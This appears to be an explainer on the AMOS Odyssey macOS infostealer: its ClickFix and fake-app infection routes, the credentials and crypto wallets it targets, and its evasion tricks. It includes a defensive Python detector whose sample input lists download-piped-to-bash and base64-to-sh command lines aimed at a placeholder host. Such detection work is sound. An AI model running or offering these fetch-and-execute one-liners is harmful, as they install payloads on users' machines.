AMOS Odyssey is the latest rebranded version of a notorious macOS infostealer known as Atomic macOS Stealer (AMOS). Unlike mercenary spyware targeting governments or journalists, Odyssey is a cybercriminal tool designed to steal money and personal data from everyday users. Its evolution signals an increasing threat to Apple’s ecosystem, especially for those active in cryptocurrency.
What is AMOS Odyssey malware?
Originally launched as AMOS, the malware was sold on Russian-speaking forums as a powerful information stealer targeting macOS devices. Its new name, Odyssey, reflects an upgraded version packed with new features. Odyssey specializes in exfiltrating financial data, browser credentials, and files, making it especially dangerous for crypto users.
How does AMOS Odyssey infect macOS users?
Odyssey spreads through social engineering rather than brute force. The most common methods include fake cracked apps, malicious ads, and phishing sites offering fake software updates. One notorious technique, called ClickFix, lures users into entering malicious commands into their Terminal under the guise of a verification process.
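As an added example (not code from the malware or from any vendor), the sketch below triages shell history or process command lines for the shape a ClickFix lure relies on: a single entered line that fetches or decodes content and hands it straight to an interpreter. The rule set, the function names and the sample lines are assumptions constructed for illustration; they are generic heuristics, not Odyssey signatures.

```python
import re

# Interpreters a pasted one-liner typically hands its payload to (assumed list).
INTERP = r"(?:ba|z|da)?sh|osascript|python3?|perl"

# Heuristic rules (assumptions, not Odyssey-specific). Legitimate installers
# use the same shapes, so a hit is a triage signal, not a verdict.
RULES = {
    "download_piped_to_interpreter": re.compile(
        rf"\b(?:curl|wget)\b[^|;]*\|\s*(?:sudo\s+)?(?:{INTERP})\b"),
    "base64_decoded_then_executed": re.compile(
        rf"\bbase64\s+(?:-d|-D|--decode)\b[^|;]*\|\s*(?:sudo\s+)?(?:{INTERP})\b"),
    "interpreter_runs_fetched_text": re.compile(
        rf"\b(?:{INTERP})\s+-c\s+[\"']?\$\(\s*(?:curl|wget)\b"),
}

# zsh extended history stores entries as ": <start>:<elapsed>;<command>".
ZSH_PREFIX = re.compile(r"^: \d+:\d+;")


def triage(command_line: str) -> list[str]:
    """Return the names of every rule the command line matches."""
    return [name for name, rx in RULES.items() if rx.search(command_line)]


def scan(lines):
    """Yield (line_number, command, hits) for each line matching any rule."""
    for n, line in enumerate(lines, 1):
        cmd = ZSH_PREFIX.sub("", line.strip())
        hits = triage(cmd)
        if hits:
            yield n, cmd, hits


# Constructed sample input, e.g. lines from ~/.zsh_history or EDR telemetry.
SAMPLE = [
    "ls -la ~/Downloads",
    ": 1700000000:0;curl -fsSL https://example.invalid/verify.sh | bash",
    "curl -fsSL https://example.invalid/pkg.tgz -o /tmp/pkg.tgz",
    "echo Y29uc3RydWN0ZWQ= | base64 -D | sh",
    '/bin/zsh -c "$(curl -fsSL https://example.invalid/install.sh)"',
]

if __name__ == "__main__":
    for n, cmd, hits in scan(SAMPLE):
        print(f"line {n}: {', '.join(hits)}: {cmd}")
```

Plain downloads to disk and pipes into non-interpreters are deliberately left unflagged so that the output stays small enough to review by hand.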
What kind of data does Odyssey steal?
Once installed, Odyssey harvests a wide range of data. It can steal browser passwords, autofill data, and cookies from Chrome, Safari, Firefox, Brave, and Edge. It also targets Apple Keychain credentials, Telegram chats, and cryptocurrency wallets such as Exodus, Electrum, and Coinomi. For added damage, it can grab files from the Documents and Desktop folders.
How does Odyssey avoid detection?
Odyssey employs several evasion techniques. It uses obfuscation, rotates its hash signatures, and applies XOR encoding to bypass antivirus tools. If it detects that it is running in a sandbox or virtual machine, it shuts itself down to avoid analysis. Recent updates even added a backdoor feature that allows attackers to swap legitimate apps with malicious clones.
Why is Odyssey especially dangerous for crypto users?
Crypto holders are prime targets because Odyssey looks directly for hot wallets stored on macOS. By stealing wallet keys or application data, attackers can siphon digital assets with little chance of recovery. The rise of Odyssey on platforms like Reddit highlights how the malware is being actively pushed to unsuspecting crypto enthusiasts.
Conclusion
So, what is AMOS Odyssey? It’s a rebranded, highly dangerous macOS infostealer that has evolved to target crypto users and personal data with alarming precision. Its growth shows why Mac owners—especially in crypto—must stay vigilant, update their systems, and avoid suspicious downloads.




















